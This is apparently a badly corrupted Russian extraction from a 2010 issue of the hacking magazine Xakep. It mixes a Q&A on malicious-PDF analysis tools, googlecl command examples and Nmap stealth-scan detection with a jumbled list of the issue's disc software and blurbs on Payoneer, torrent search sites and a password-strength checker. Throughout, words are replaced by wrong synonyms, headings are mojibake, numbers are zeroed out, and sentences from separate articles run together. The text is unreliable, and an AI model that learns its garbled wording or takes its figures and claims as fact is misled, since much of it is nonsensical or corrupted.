базе Linux"а).net/mupdf) — альтернативные просмотрщики.info/software/ sumatrapdf) равным образом MuPDF (ccxvii.com/p/googlecl).sourceforge. а как сменный безжалостный диск.google. z XÀÊÅÐ 00 /141/ 00 . которые потребно проверить. того комплексный ревю считанные разы такое сканирование фиксирует. Увы. как программа сделает до сей времени итерации. Правда. позволяющий обращаться ко сервисам гугла изо командной строки.bat» равно готовимся закрыть множество всплывающих окон! После того. так автор сможем поделить накопитель получай ряд разделов. неравно PDF-документ содержит строку. A: PDFiD (blog. в зависимости ото кода. ась? совершать шифр возьми Python Все сии консольные утилиты работают через Google Data API равным образом доступны как бы ради Windows. пользоваться для сервисам Google с командной строки? Хочу автоматизировать считывание фотографий c Picasa Web. а тоже декодирует PDF-файлы. так на системе будет предназначаться лишь только одинокий изо разделов. Q: Есть ли возможность. Таким образом.email > contacts. невыгодный заработает. Примеры использования: Ñåðâèñ áëîãîâ Blogger: $ google blogger post --title "foo" "command line posting" Êàëåíäàðü Calendar: $ google calendar add "Lunch with Jim at noon tomorrow" Êîíòàêòû Contacts: $ google contacts list name. сие легко и просто делается от помощью firewall"а. Q: Как определить скрытое сканнирование Nmap? A: Метод скрытого сканирования Nmap используется на фолиант случае. что такое? свидетельствует что до скрытом сканировании.kowalczyk.avi Написал его быстро. путем «Управление дисками» во системе).org/origami) — изучает структуру PDF-файла. Sumatra PDF (blog. по-под Vista/Windows7 возлюбленная сообразно умолчанию далеко не работает. во которых сплоит.com/2009/06/ jsunpack-n-updates-for-pdf-decoding. благодаря тому шибать ее придется во режиме совместимости. Q: Составляю подборку для того изучения вредоносных PDF-файлов. В результате использования специального модуля сверху i386 процессорах не запрещается добавиться 0-100-кратного увеличения производительности.rb». дальнейший (FIN) проверяет. вовсе новобрачный появился пачка googlecl (code. Больших знаний и умений возлюбленная отнюдь не требует: порядочно выбрать из списка букву нужной флешки равно выжать на кнопку «Flip Removable Bit».didierstevens. Первый список состояний (ACK.

0.04 SUMo 0.1 ssh2ftpcrack 0.6.0.7 Opera 00.3 WebIssues 0.0 ZFS 0.2.4.2 Notepad++ 0.11.6 Nikto 0.26 BIND 0.90 Grindstone 0 HashTab 0.0 VideoInspector 0.40 BlueScreenView v1.7 Mitter 0.4 Komodo IDE 0.7a >Net Ad Muncher v4.3 DigiKam 0.10 Wing IDE Professional 0.4.0 Beta TekSIP 0.8 TeamViewer 0.8 OpenMeetings 0.10 Wing IDE Professional 0.6 x 00 (ОКТЯБРЬ) 0010 141 METASPLOIT FRAMEWORK ÂÅÁ-ÊÀÌÅÐÀ ÍÀ ÑÅÐÂÎÏÐÈÂÎÄÀÕ ÊÐÓÃÎÂÀß ÎÁÎÐÎÍÀ LINUX ÄÅÑÊÒÎÏÀ ÂÑÊÐÛÂÀÅÌ ÕÈÒÐÛÉ SALITY.10 Wpbruteforcer RabbitMQ 0.2 boost 0.18 Wt 0.2.2b1 Komodo Edit 0.2 Eric5 0.8 NirCmd 0.9.9.0.3.22.1.2.3 Synergy 0.6.92 q4wine 0.0 Vaadin 0.8 foobar2000 0.1.13 Cairo-dock 0.0 build 0420 x86 FileZilla Client 0.0.1 K-Lite Mega Codec Pack 0.5 НОКАУТ ДЛЯ AOL/ РУТОВЫЕ ПРИВИЛЕГИИ НА СЕРВЕРЕ КОРПОРАЦИИ AOL № 00(141)ОКТЯБРЬ 0010 x >>WINDOWS >Dailysoft 7-Zip 0.7 Python 0.5.11 Все пользу кого Python: ActivePython 0.2 SCons 0.0 Miranda IM v0.1.0.8.20 Wireshark 0.1.7 Samba 0.0 Fructose 0.4 Auslogics Disk Defrag 0. 06 ÐÓÒÎÂÛÅ ÏÐÈÂÈËÅÃÈÈ ÍÀ ÑÅÐÂÅÐÅ ÊÎÐÏÎÐÀÖÈÈ AOL ÍÎÊÀÓÒ ÄËß AOL ОКТЯБРЬ 00 (141) 0010 РЕ КО М ЦЕ ЕН НА Д : 0 ОВА 10 Н р.7.3.0 ProcNetMonitor RIPS 0.5 QtiPlot 0.0.0. НА ÑÒÐ.3 GNU make 0.8 Build 015.1225 Far Manager v2.8.8 Bluez-tools 0.2 Drivel 0.05 Pidgin for Windows 0.45 ProgDVB 0.0 Nufw 0.5.11.1 Voidssh WhatWeb 0.1.2.1.0 xsser 0. 04 ÊÎÍÔÅÐÅÍÖÈß HACK IN THE BOX ÎÒ ÏÅÐÂÎÃÎ ËÈÖÀ ÍÀØÈ ÍÀ HITB ÑÒÐ.375.7 x64 Python 0.14.4.0.2.3.1 Shotwell 0.2.47 FilerFrog 0.0.6.10.4.0.1 Nitro++ 0.48 SetupBatteryCare 0.6 Whoosh 0.4.0 DynamicLoadLibraryTest ExploitMyUnion 0.4 Squid 0.96.0 Suricata 0.5 >Server Apache 0.4 Boxee 0.4 Imagination 0.2 True Launch Bar 0.9.4.46.98 Speccy 0.35.2a Python 0.1.7.4.1.1.0.3.2 DrPython 0.28 Claws Mail 0.35.4.2 geany 0.2 x64 Spyder 0.9.7.0 Firewall Builder 0.1 FirePassword 0.28 CCleaner 0.2.1 FuzzDiff Graudit 0.6 Download Master 0.4 Webilder 0.1.20.150 Auslogics Registry Cleaner 0.5 Seesmic 0.5 KOffice 0.2 gnash 0.7 Vsftpd 0.95 TechPowerUp GPU-Z v0.0.44.127 Lightspark 0.0.3 RSMangler 0.9 Visual Router Torrent 0.7.0 Ejabberd 0.3.04 Sandboxie 0.4.4 DBMail 0.2 Ruby 0.0 FreeApps v1.2 Sysinternals Suite Total Commander 0.6.4 Wing IDE 001 0.4.97.1 Inkscape 0.1 >Games ManiaDrive 0.0b3 Komodo IDE 0.4 MongoDB 0.13 RC >Games GunGirl 0 v1.0 XnView 0.9.7.55 Unlocker 0.9 GCstar 0.4.0 Clamav 0.3.6 OpenVPN 0.11.3 QIP 0010 Build 0000 Skype 0.9.16 DHCP 0.4 >System AstroGrep 0.8 Google Chrome 0.0 Clojure 0.1 Firefox 0.1.61 Qwit 0.6 QGIS 0.1 Glippy 0.9 Linux Kernel 0.146 LanTopolog 0.8252 Vuze 0.2.4 Listener 0.4.6.48 KMyMoney 0.2 Cvechecker 0.4 >Net Balsa 0.AA ÂÛÁÈÐÀÅÌ ËÅÃÊÎÂÅÑÍÎÅ VPN-ÐÅØÅÍÈÅ ÑÒÐ.0g Driver Magician 0.65 DAEMON Tools Lite 0.3.6 FOCA Free 0.8.0 Dovecot 0.2.60 Skype 0.1 Sipwitch 0.6 >Security ChromePasswordDecryptor 0.6. 08 CALLBACK: ÝÊÎÍÎÌÈß ÍÀ ÑÂßÇÈ ТУЛКИТ ДЛЯ СОЦИАЛЬНОЙ ИНЖЕНЕРИИ Я .1.32 Vera 0.119 SBackup 0.1 Daphne 0.7 Lighttpd 0.4.37 Beta Process Hacker 0.0.6.10 ECMerge 0.0 Picasa for Windows 0.0.0b4 >Development ClickHeat 0.18 CDEmu 0.0 Find and Run Robot 0.40 digsby Build 02 Beta gpg4win 0.0 RadioTray 0.9.5 Wireshark 0.124 VLC (VideoLAN) for Windows 0.>Misc AltDrag 0.1.0 Droid 0.1 Jython 0.8 Wine 0.5 Freeradius 0.3 NmapSI4 OperaPasswordDecryptor 0.8 Camouflage v1.9 Beta Build 02193 BluetoothView 0.4 ZinjaI 00100829 >>UNIX >Desktop Adobe Reader 0.4 NTFS-3G 0010.4 System Silencer 0.0 Vim 0.0 beta 0 TeamSpeak Client for Windows 3.2 Python 0.1.1 Feh 0.0 KeyPass 0.0 dd_rescue 0.0 CLIcompanion 0.0 WinAppDbg 0.4 Komodo Edit 0.6 Deluge 0.5 Emsisoft HiJackFree 0.23 OpenSSH 0.20 Iptables 0.9.3 Midori 0.8.0 Myjit 0.0 CrystalDiskMark 0.1 Audacious 0.1.2 >Devel ATI Stream SDK 0.0.0.1 IronPython 0.7 Halberd 0.2.1 CUPS 0.3 Ora2Pg 0.4.9 HAproxy 0.4.5.15.5 Greenshot 0.2.1.0.2 IEPasswordDecryptor 0.82 iText 0.15281 Open Hardware Monitor 0.1 Smb4k 0.3.2 UltraEdit 06.2 Opera 00.3.5.0.4 Songbird 0.1 Sdcc 0.9 Virtual Router >System ATI Catalyst 00.9.3.9.9.3 Format Factory 0.1 Pydev for Eclipse 0.4 amaroK 0.61 PuTTY 0.0.35 Comodo Internet Security (32bit) 0.3 Postfix 0.1.2.6 RSSOwl 0. 04 СТР.1.0.6.1 PyScripter v2.3 PWGen 0.7.8.41 RegSeeker 0.6.0.6 DLLHijackAuditKit v2 DllHijackAuditor 0.7.2beta >Multimedia AnyToISO DualVR 0.3 VLC 0.5 DotDotPwn 0.2.1.28 MySQL 0.2.8 VirtualBox 0.8.5.2.3.0 GMER 0.6 OpenLDAP 0.0 Home Ftp Server 0.10.0 Xorg server 0.2 Poppler 0.3 Links 0.9.2 Lifeograph 0.2.0.8 PCSX-Reloaded 0.9.0b3 Portable Python 0.0.2 >Security CeWL 0.1.2.50 Nsd 0.0.19.55 Synchronicity 0.3.39 PixelLight 0.5 Mozilla Firefox 0.6.

iorad. Карта овчинка выделки стоит небольших денег равным образом на течение нескольких недель приходит на Россию согласно обычной почте. установить «gfhjkm» (слово «пароль» в латинской раскладке) да показать.com).torrentфайлов www. kinobaza. Впрочем. так из аюшки? следует равным образом совершенно идеальная интерактивная инструкция. однако зато для наших ресурсов лакомиться остальные поисковики: torrtilla. Увы. Для взлома «#R00t$H3ll» уйдет 095 лет.tv. Достаточно зайти на сайт howsecureismypassword.com Нас неоднократно спрашивают: «Как надергать денюжка вслед работу ото иностранного заказчика?».torrentz. что такое? экой пасс сбрутится бери обычном PC вслед 00 секунд.ru.net. Но буде возьми скринкаст положить красивые комментарии на виде всплывающих плашек.com Скринкасты — удобнейший инструмент. которые отлично работают во России.com Когда-то давно.payoneer.net Скорость подбора вместе с через пароля допускается воссоздать нехитрой математической формулой: численность возможных символов. Вводишь обозначение файла равно получаешь ссылки сверху .payoneer. показывать важные азы или окна. которая является излюбленной платежной системой получи и распишись западе. У западных фрилансерских бирж (GetAFreelancer. Создать безвыгодный просто скринкаст. eLance) долгое сезон были близкие порядки вывода денег. затемняя всё прочий экран. казалось бы. русские трекеры они обходят стороной. который долгота пароля заметно превыше его сложности. простой «abcdefg1234567» — 0722 года.howsecureismy password. поделенное получи цифра перебираемых паролей во секунду. Не надо ничего ставить сверху компьютер. 0torrents.org.torrent от информацией о сидерах да личерах. К счастью. oDesk. Для западных трекеров одними с самых лучших сервисов являются torrentz. подмечать клики мыши. возведенное в разряд длины пароля. а на. XÀÊÅÐ 00 /141/ 00 . выработать сноски. Теперь а вместо вменяемых ссылок получи трекеры во результатах получаешь кучу спама от фейковых порталов видать torrentdownloads. TORRENTZ Для поиска . в надежде разыскать . а прямо интерактивные мануалы от подробными комментария ми равным образом сопутствующими эффектами позволяет веб-сервис IORAD. для того начатки работы ничего не поделаешь лишь зарегистрироваться возьми сервисе равно оказать давление кнопку «Capture». отнюдь не нужно лгать его математикой. Для вывода средств тебе остается лишь выделить объем своего аккаунта в Payoneer. неравно нужно как бы продемонстрировать.torrent в целях скачивания чего-либо хватит было нанять на Google «название файла .UNITS HTTP:// WWW2 PAYONEER Для приема платежей от западных заказчиков www.com да isohunt.net. С через Payoneer не запрещается ажно получать платежи по PayPal. Заниматься фильтрацией ручной — задание неблагодарная. в дальнейшем что такое? аллегро стягивать перечисленные деньга от любой банкомат. пока что постоянно они стали помогать технология выплат с помощью карточек с компании Payoneer (www. Вообще потестить пароли хватит интересно: сразу становится видно. так чтобы фундировать человеку. В результате отсюда следует примерное пора в секундах.torrent». Для проверки надежности пароля HOW SECURE IS MY PASSWORD? www. почему ваш покорный слуга куда памяти стал использовать специальные torrent-поисковики.com. 144 Для создания скринкастов и интерактивных инструкций IORAD www. аюшки? возьми деле означает простой пароль. RentACoder.

.

Реклама .